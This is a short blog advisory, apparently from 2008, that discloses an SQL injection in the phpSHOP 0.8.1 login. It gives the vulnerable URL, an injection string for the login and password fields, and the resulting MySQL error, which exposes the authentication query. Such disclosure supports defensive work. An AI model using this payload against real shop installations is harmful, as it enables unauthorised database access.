phpSHOP 0.8.1 SQL Injection Vulnerability

[+]———————————————-[+]

phpSHOP 0.8.1 SQL Injection
[+]———————————————-[+]
author: y2h4ck
e-mail: y2h4ck[ at ] gmail.com
page: https://y2h4ck.wordpress.com
[+]———————————————-[+]
Vuln script: http://shop/0.8.1/?login=1&&
String: /?login=‘1==1’ select —
In the login/password input box you can pass some SQL Injection strings to manipulate
the behavior of the mysql Queries to the phpSHOP
Result:
[+]———————————————-[+]
Database error: Invalid SQL: SELECT * from auth_user_md5,user_info WHERE auth_user_md5.username =”1==1′ select –‘ AND auth_user_md5.password =’d41d8cd98f00b204e9800998ecf8427e’AND auth_user_md5.password =’d41d8cd98f00b204e9800998ecf8427e’AND auth_user_md5.user_id = user_info.user_id AND user_info.address_type = ‘BT’

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1==1’ select –‘ AND auth_user_md5.password =’d41d8cd98f00b204e9800998ecf8427e’A’ at line 1)

[+]———————————————-[+]

Version: 0.8.1
Vendor : www.phpshop.org

Date: 14/02/2008

[+]———————————————-[+]

Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s